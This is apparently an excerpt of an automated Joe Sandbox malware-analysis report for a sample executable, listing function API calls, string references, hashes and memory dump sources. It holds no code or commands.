                                                                                                                      • Opcode Fuzzy Hash: 25f0a18f45ca8ac95744dc44ec183d6f8b1a5c1375ec100692e39d2acb74fefe
                                                                                                                      • Instruction Fuzzy Hash: C411A336200204A7CB06BB69ECC6DBF7FA9DF45340B00443EF606DF292DE649C4697A0
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 003C45EC: __FF_MSGBANNER.LIBCMT ref: 003C4603
                                                                                                                        • Part of subcall function 003C45EC: __NMSG_WRITE.LIBCMT ref: 003C460A
                                                                                                                        • Part of subcall function 003C45EC: RtlAllocateHeap.NTDLL(00F20000,00000000,00000001), ref: 003C462F
                                                                                                                      • std::exception::exception.LIBCMT ref: 003C013E
                                                                                                                      • __CxxThrowException@8.LIBCMT ref: 003C0153
                                                                                                                        • Part of subcall function 003C7495: RaiseException.KERNEL32(?,?,003A125D,00456598,?,?,?,003C0158,003A125D,00456598,?,00000001), ref: 003C74E6
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                                                                                                      • String ID: bad allocation
                                                                                                                      • API String ID: 3902256705-2104205924
                                                                                                                      • Opcode ID: e3cf3dae8491a84e7acfcd17c6d47dd6cbc1df7029c91ec630f3dedc8408439a
                                                                                                                      • Instruction ID: 74ae2c81d6b114c6994b1b7349407686ef8f1d19dfb3bb23d5626ea103dbb87c
                                                                                                                      • Opcode Fuzzy Hash: e3cf3dae8491a84e7acfcd17c6d47dd6cbc1df7029c91ec630f3dedc8408439a
                                                                                                                      • Instruction Fuzzy Hash: BFF0A43960825DA6C71BAAE8E802FDEB7EC9F04350F54441EFD04DA181DBB09E8097A9
                                                                                                                      APIs
                                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?,?,003AC00E,?,?,?,?,00000010), ref: 003AC627
                                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,?,?,?,00000010), ref: 003AC65F
                                                                                                                      • _memmove.LIBCMT ref: 003AC697
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ByteCharMultiWide$_memmove
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3033907384-0
                                                                                                                      • Opcode ID: 4f8d4dccffb3ca6708f3c4229c2fade5b2b2d9256fd5c8ef96b45cca7f4fc8f1
                                                                                                                      • Instruction ID: e34059946304f09b9a7ed2356db25bccb7b11dda6e86335bddedcb0ace27cb84
                                                                                                                      • Opcode Fuzzy Hash: 4f8d4dccffb3ca6708f3c4229c2fade5b2b2d9256fd5c8ef96b45cca7f4fc8f1
                                                                                                                      • Instruction Fuzzy Hash: 373109B2600201ABD7299B38D846F6BB7D9EF45310F18553EF85ACB6A0EB32E850C751
                                                                                                                      APIs
                                                                                                                      • __FF_MSGBANNER.LIBCMT ref: 003C4603
                                                                                                                        • Part of subcall function 003C8E52: __NMSG_WRITE.LIBCMT ref: 003C8E79
                                                                                                                        • Part of subcall function 003C8E52: __NMSG_WRITE.LIBCMT ref: 003C8E83
                                                                                                                      • __NMSG_WRITE.LIBCMT ref: 003C460A
                                                                                                                        • Part of subcall function 003C8EB2: GetModuleFileNameW.KERNEL32(00000000,00460312,00000104,?,00000001,003C0127), ref: 003C8F44
                                                                                                                        • Part of subcall function 003C8EB2: ___crtMessageBoxW.LIBCMT ref: 003C8FF2
                                                                                                                        • Part of subcall function 003C1D65: ___crtCorExitProcess.LIBCMT ref: 003C1D6B
                                                                                                                        • Part of subcall function 003C1D65: ExitProcess.KERNEL32 ref: 003C1D74
                                                                                                                        • Part of subcall function 003C889E: __getptd_noexit.LIBCMT ref: 003C889E
                                                                                                                      • RtlAllocateHeap.NTDLL(00F20000,00000000,00000001), ref: 003C462F
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1372826849-0
                                                                                                                      • Opcode ID: a6daed34449580ead268698b7dc9b9061dacc46efdcc5e3950bde37d76de5ff7
                                                                                                                      • Instruction ID: d59a1c45853468d604eed31e691c42d5b27b1176146ffd26e5f4597d7852541d
                                                                                                                      • Opcode Fuzzy Hash: a6daed34449580ead268698b7dc9b9061dacc46efdcc5e3950bde37d76de5ff7
                                                                                                                      • Instruction Fuzzy Hash: 2101D231601311AAE6273B34AC22F6A3748AB82761F12003EF901DF596DFB09C418B69
                                                                                                                      APIs
                                                                                                                      • TranslateMessage.USER32(?), ref: 003AE646
                                                                                                                      • DispatchMessageW.USER32(?), ref: 003AE651
                                                                                                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 003AE664
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Message$DispatchPeekTranslate
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4217535847-0
                                                                                                                      • Opcode ID: 4d5108ba9267991bc4199800acaf9efed22b8dc06ca8a258343417ad6d894d56
                                                                                                                      • Instruction ID: d8c46843713153cb45129c3519573b94f1e8b96add170dfe076188c5201c757d
                                                                                                                      • Opcode Fuzzy Hash: 4d5108ba9267991bc4199800acaf9efed22b8dc06ca8a258343417ad6d894d56
                                                                                                                      • Instruction Fuzzy Hash: 4AF058326043469BDB21EAE08D49BABB3DDAF84340F480C3EB641C20A0EBA4D4008726
                                                                                                                      APIs
                                                                                                                      • _free.LIBCMT ref: 003EC45E
                                                                                                                        • Part of subcall function 003C28CA: RtlFreeHeap.NTDLL(00000000,00000000,?,003C8715,00000000,003C88A3,003C4673,?), ref: 003C28DE
                                                                                                                        • Part of subcall function 003C28CA: GetLastError.KERNEL32(00000000,?,003C8715,00000000,003C88A3,003C4673,?), ref: 003C28F0
                                                                                                                      • _free.LIBCMT ref: 003EC46F
                                                                                                                      • _free.LIBCMT ref: 003EC481
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _free$ErrorFreeHeapLast
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 776569668-0
                                                                                                                      • Opcode ID: 087bea45b9e552155f1be1c866ba964bb642fabb90d708dc02c9b9c981af8e32
                                                                                                                      • Instruction ID: a611aef373909868293f3582efcccbf597ccb89253f1df2d21cc97d4c3b0fc31
                                                                                                                      • Opcode Fuzzy Hash: 087bea45b9e552155f1be1c866ba964bb642fabb90d708dc02c9b9c981af8e32
                                                                                                                      • Instruction Fuzzy Hash: 81E0C2A120075082CA22A97B6840FB723CC2F04390B04192DF449DB1C2CF38EC408634
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: CALL
                                                                                                                      • API String ID: 0-4196123274
                                                                                                                      • Opcode ID: b95af6db3605996ed70ecaa368f320850c734d47b72d517b875766b36a45122c
                                                                                                                      • Instruction ID: ce8aa6a28d58f9d862e1fb0a5c06d747db0687b5d97adb09bf6c7a14a325c7b5
                                                                                                                      • Opcode Fuzzy Hash: b95af6db3605996ed70ecaa368f320850c734d47b72d517b875766b36a45122c
                                                                                                                      • Instruction Fuzzy Hash: 81228E70508340CFD72ADF14C491AABB7E1FF85308F15896DEA968BB61D735E884CB42
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _memmove
                                                                                                                      • String ID: EA06
                                                                                                                      • API String ID: 4104443479-3962188686
                                                                                                                      • Opcode ID: f9f7581f51cba879cec07006e9e5f30028c3ce9a4b459145c8c5c1c64d2a040f
                                                                                                                      • Instruction ID: 142dd4ddb4ab14d35197700fea9728714019598a226199732fce047673f91ad4
                                                                                                                      • Opcode Fuzzy Hash: f9f7581f51cba879cec07006e9e5f30028c3ce9a4b459145c8c5c1c64d2a040f
                                                                                                                      • Instruction Fuzzy Hash: CC419D31A041549BCB13DB648C967BFBFA5DBD7300F288575EA82DF283D6A18DC097A1
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Similarity
                                                                                                                      • API ID: _wcscmp
                                                                                                                      • String ID: 0.0.0.0
                                                                                                                      • API String ID: 856254489-3771769585
                                                                                                                      • Opcode ID: b5f92c376d5aa594a75002bc1d8c2cd3407828f9de9a61ea117e29a0b2bdb61c
                                                                                                                      • Instruction ID: c261a3cbafcee7a3a6711412825fc7a70d166e3608d9702f1fe85054ac4ca83b
                                                                                                                      • Opcode Fuzzy Hash: b5f92c376d5aa594a75002bc1d8c2cd3407828f9de9a61ea117e29a0b2bdb61c
                                                                                                                      • Instruction Fuzzy Hash: FB11CA39700208DFCB09EF59D991E69B3A9BF49710F148059F605AF392DA70ED41CB94
                                                                                                                      APIs
                                                                                                                      • _memset.LIBCMT ref: 00413CF1
                                                                                                                        • Part of subcall function 003A31B8: GetFullPathNameW.KERNEL32(00000000,00000104,?,?), ref: 003A31DA
                                                                                                                        • Part of subcall function 003A3A67: SHGetMalloc.SHELL32(1<:), ref: 003A3A7D
                                                                                                                        • Part of subcall function 003A3A67: SHGetDesktopFolder.SHELL32(?), ref: 003A3A8F
                                                                                                                        • Part of subcall function 003A3A67: SHGetPathFromIDListW.SHELL32(?,?), ref: 003A3AD2
                                                                                                                        • Part of subcall function 003A3B45: GetFullPathNameW.KERNEL32(?,00000104,?,?,004622E8,?), ref: 003A3B65
                                                                                                                      Strings
                                                                                                                      Similarity
                                                                                                                      • API ID: Path$FullName$DesktopFolderFromListMalloc_memset
                                                                                                                      • String ID: X
                                                                                                                      • API String ID: 2727075218-3081909835
                                                                                                                      • Opcode ID: 0ee89d062dfceab4ebf7e4f25bbd540f599ca837422487cb7061341628f59dc6
                                                                                                                      • Instruction ID: e2ecb2150fae0ceb624892291ef19c4ae9da1b1e3d34e59fe04dc53bebc977a0
                                                                                                                      • Opcode Fuzzy Hash: 0ee89d062dfceab4ebf7e4f25bbd540f599ca837422487cb7061341628f59dc6
                                                                                                                      • Instruction Fuzzy Hash: B3118D71A10198ABCF06DF94D8056DEBBF9EF46705F04801EF801BB241DBB956498BA5
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Similarity
                                                                                                                      • API ID: _memmove
                                                                                                                      • String ID: "F
                                                                                                                      • API String ID: 4104443479-3694933529
                                                                                                                      • Opcode ID: 8ae861b08919a90c507ee4f6a46fed65405db0e9e4c8acd5dc8e223ee5cf7305
                                                                                                                      • Instruction ID: cec3a74a029a8af469c833c76d4c398d89a57ce99f965de66b70a51a2effb724
                                                                                                                      • Opcode Fuzzy Hash: 8ae861b08919a90c507ee4f6a46fed65405db0e9e4c8acd5dc8e223ee5cf7305
                                                                                                                      • Instruction Fuzzy Hash: F901D636200265ABCB199F2DC8919AB77A9EFC5314714812EE50ACF245D631E901C790
                                                                                                                      Strings
                                                                                                                      • >>>AUTOIT NO CMDEXECUTE<<<, xrefs: 004134AA
                                                                                                                      Similarity
                                                                                                                      • API ID: LibraryLoad
                                                                                                                      • String ID: >>>AUTOIT NO CMDEXECUTE<<<
                                                                                                                      • API String ID: 1029625771-2684727018
                                                                                                                      • Opcode ID: 5e8b749440fc97aceb3e3ef7377aaa1a1f1d69aed0bd2c2f1af58222be055853
                                                                                                                      • Instruction ID: 226d8ded0c8f5ebd755e3a8bb42c1880e057acc176f18ef1609242320ff282d3
                                                                                                                      • Opcode Fuzzy Hash: 5e8b749440fc97aceb3e3ef7377aaa1a1f1d69aed0bd2c2f1af58222be055853
                                                                                                                      • Instruction Fuzzy Hash: EDF01872D0520DAE9F12EFB5D851DFFB77CEA15310F208526F81696181EB349B09DB21
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 003E6623: SetFilePointerEx.KERNEL32(?,?,?,00000000,00000001,00000003,?,003E685E,?,?,?,00414A5C,0043E448,00000003,?,?), ref: 003E66E2
                                                                                                                      • WriteFile.KERNEL32(?,?,"F,00000000,00000000,?,?,?,00414A5C,0043E448,00000003,?,?,003A4C44,?,?), ref: 003E686C
                                                                                                                      Strings
                                                                                                                      Similarity
                                                                                                                      • API ID: File$PointerWrite
                                                                                                                      • String ID: "F
                                                                                                                      • API String ID: 539440098-3694933529
                                                                                                                      • Opcode ID: 5fa5c9520f36c6b0ad59bc9f5ad8b661a8cc4681a5a5ee82b4870fd1f3e3d1a9
                                                                                                                      • Instruction ID: b2a764d051b30f6e5cb37c88b8b167ffcd0647c7ed3b3c5ce0f12c5cc58f772b
                                                                                                                      • Opcode Fuzzy Hash: 5fa5c9520f36c6b0ad59bc9f5ad8b661a8cc4681a5a5ee82b4870fd1f3e3d1a9
                                                                                                                      • Instruction Fuzzy Hash: FBE04636400218BBDB20AF94D801A8ABBB8EB04350F10051AF94295050D7B5AA149BA4
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 003A193B: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 003A1952
                                                                                                                      • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 003DE3AA
                                                                                                                      Strings
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend$Timeout
                                                                                                                      • String ID: @U=u
                                                                                                                      • API String ID: 1777923405-2594219639
                                                                                                                      • Opcode ID: 9d2e6813e966f2517e8bb93bf66660d056a5032529717d815ef737eb369f5ccf
                                                                                                                      • Instruction ID: 05e716fd803e19091f677a24182e7bd5727a28b9d4e31a1848d7a3f2cfcf6b85
                                                                                                                      • Opcode Fuzzy Hash: 9d2e6813e966f2517e8bb93bf66660d056a5032529717d815ef737eb369f5ccf
                                                                                                                      • Instruction Fuzzy Hash: 2CD01235244110AAFA716B14FD06FD17B92DB41750F12046EB5806B1E5C7D25C419584
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: a2de04b9bef25b0b45a1c8b55817ba9b7b5072747aa3136326e1faf997f43921
                                                                                                                      • Instruction ID: a82e523f3020d6a9fcae2a83c210d72b502fa9082c80a77938fbc3706d9d9a9c
                                                                                                                      • Opcode Fuzzy Hash: a2de04b9bef25b0b45a1c8b55817ba9b7b5072747aa3136326e1faf997f43921
                                                                                                                      • Instruction Fuzzy Hash: D65191316043018FCB15EF29C891BEAB7E5AF89314F14856EF9968F692CB30E845CB51
                                                                                                                      APIs
                                                                                                                      • GetCursorPos.USER32(?), ref: 003F8074
                                                                                                                      • GetForegroundWindow.USER32 ref: 003F807A
                                                                                                                        • Part of subcall function 003F6B19: GetWindowRect.USER32(?,?), ref: 003F6B2C
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$CursorForegroundRect
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1066937146-0
                                                                                                                      • Opcode ID: 1069f1db75d6aaaf50a65d815562a14f5e797487f1b551f15d71f43a0c28a895
                                                                                                                      • Instruction ID: 9572e172e966b14c7deb6e794679aedb118fe29af864fa2cb658c4eabb16f112
                                                                                                                      • Opcode Fuzzy Hash: 1069f1db75d6aaaf50a65d815562a14f5e797487f1b551f15d71f43a0c28a895
                                                                                                                      • Instruction Fuzzy Hash: 80315B75A00118AFDF16DFA4CC81AFEB7B4FF05314F10452AE945AB251DB34AE45CB50
                                                                                                                      APIs
                                                                                                                      • IsWindow.USER32(00000000), ref: 0041DB31
                                                                                                                      • IsWindow.USER32(00000000), ref: 0041DB6B
                                                                                                                        • Part of subcall function 003A1F04: GetForegroundWindow.USER32 ref: 003A1FBE
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$Foreground
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 62970417-0
                                                                                                                      • Opcode ID: 2e6d4fa61e28cd85ef8f4d7b23ba3cad6946fb21ea9b35adf23a6fdfd5cf6385
                                                                                                                      • Instruction ID: 4834a16a5b479e843c7f66c8513ef60df5277d3f75d78c974df2892b18886234
                                                                                                                      • Opcode Fuzzy Hash: 2e6d4fa61e28cd85ef8f4d7b23ba3cad6946fb21ea9b35adf23a6fdfd5cf6385
                                                                                                                      • Instruction Fuzzy Hash: 022190B2600206AADB26AF75C845FFFB7A9DF82784F014429F95B8B141DB74ED01D760
                                                                                                                      APIs
                                                                                                                      • 74BFC8D0.UXTHEME ref: 003A36E6
                                                                                                                        • Part of subcall function 003C2025: __lock.LIBCMT ref: 003C202B
                                                                                                                        • Part of subcall function 003A32DE: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 003A32F6
                                                                                                                        • Part of subcall function 003A32DE: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 003A330B
                                                                                                                        • Part of subcall function 003A374E: GetCurrentDirectoryW.KERNEL32(00000104,?,00000000,00000001), ref: 003A376D
                                                                                                                        • Part of subcall function 003A374E: IsDebuggerPresent.KERNEL32(?,?), ref: 003A377F
                                                                                                                        • Part of subcall function 003A374E: GetFullPathNameW.KERNEL32(C:\Users\user\Desktop\._cache_LWQDFZ.exe,00000104,?,00461120,C:\Users\user\Desktop\._cache_LWQDFZ.exe,00461124,?,?), ref: 003A37EE
                                                                                                                        • Part of subcall function 003A374E: SetCurrentDirectoryW.KERNEL32(?), ref: 003A3860
                                                                                                                      • SystemParametersInfoW.USER32(00002001,00000000,?,00000002), ref: 003A3726
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InfoParametersSystem$CurrentDirectory$DebuggerFullNamePathPresent__lock
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3809921791-0
                                                                                                                      • Opcode ID: be985e0b4e32572acb90ed8c367d57dfd5e4ce05a01189ceb89ef6cf9a0fe610
                                                                                                                      • Instruction ID: 4727a52d637f03c1aca27ee0eab4248ba593ab1c7418cad69531dfd256f6c0da
                                                                                                                      • Opcode Fuzzy Hash: be985e0b4e32572acb90ed8c367d57dfd5e4ce05a01189ceb89ef6cf9a0fe610
                                                                                                                      • Instruction Fuzzy Hash: AF11CD719083419BC711DF29ED4594AFBE8FF85710F004A2FF884872B1EBB19980CB9A
                                                                                                                      APIs
                                                                                                                      • CreateFileW.KERNEL32(?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000001,?,003A4C2B,?,?,?,?,003ABE63), ref: 003A4BB6
                                                                                                                      • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,00000001,?,003A4C2B,?,?,?,?,003ABE63), ref: 00414972
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmp
